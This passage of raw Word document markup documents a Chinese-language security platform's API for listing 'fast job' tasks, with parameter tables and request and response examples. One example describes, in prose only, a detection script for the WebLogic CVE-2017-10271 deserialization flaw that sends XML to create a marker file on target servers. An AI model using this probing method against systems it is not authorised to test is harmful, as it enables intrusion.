          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="435A3D7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77F5653B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C398890" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="459C93BD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B3D81B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71A5C25C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F1E39CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="53C22396" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22DC95E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>categories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="036F630A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="633718E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69826485" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59DC2601" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updatedTimeRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DAADF82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Map&lt;String, String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F4D74B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A572153" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>排序字段</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1484"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5069A65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BA65348" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06D5BABD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="629512CF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00206FD2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="776E6E94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E245C04" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BFF7EC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63AF10CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C975620" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63EAF399" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47900EDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54D01704" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0FC500" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/fastjob/task/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0574F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"osType"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>//1：linux；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>2：windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"ids"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"0478ee5024763edc6d3c"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"Weblogic"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"categories"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"安全检测"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"应急响应"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"updatedTimeRange"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>min</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-06-21 16:39:59"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>max</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-06-28 16:39:59"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42649A52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288101EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"rows"</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0478ee5024763edc6d3c"</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eblogic &lt; 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"description"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"漏洞描述： WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。 检测过程： 1.首先获取weblogic的kb,进行遍历，获取其中的servers字段后，再进行一次遍历一遍获取服务器监听的ip和端口信息，将每一个server组合成一个新的数组 2.遍历每一个server，获取其中的proto(协议类型)、ip、port,其中先对ip地址进行处理(weblogic 10.3.4后为ipv6地址)，然后组合成url,并往url发送xml数据。根据当前时间戳生成一个文件名，xml数据的作用则是创建该文件。 3.遍历根据时间戳生成的文件名数组,判断其是否存在。如果文件存在，则上报存在漏洞。否则上报不存在漏洞 使用场景： 可通过该脚本进行快速识别哪些主机上存在Weblogic服务然后判断是否存在反序列化漏洞，并将存在漏洞的主机上报。"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"category"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"安全检测"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"riskInfo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"注意： 漏洞检测结果基于已有Weblogic KB数据进行漏洞存在性判断，若您在是在刚刚修复完成漏洞后进行检测，则需要先更新数据依赖后再执行该检测脚本获取最新漏洞检测结果。"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"updatedTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-05-30 09:42:42"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"total"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7833952B"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484"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="38AE2E6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DEE9C0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75E50A90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ED33BE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B56561F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D367697" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D704489" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57023920" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>快速任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52293F73" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A32A068" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="534071A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A54CC29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>快速任务名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="430100FD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1373F09A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61E204E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36E324A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>快速任务类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="799F0D97" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="188FD536" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60F3304A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C905F25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务概述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1DFA9956" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65D9637F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>riskInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FCAF2E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07D553C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险提示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
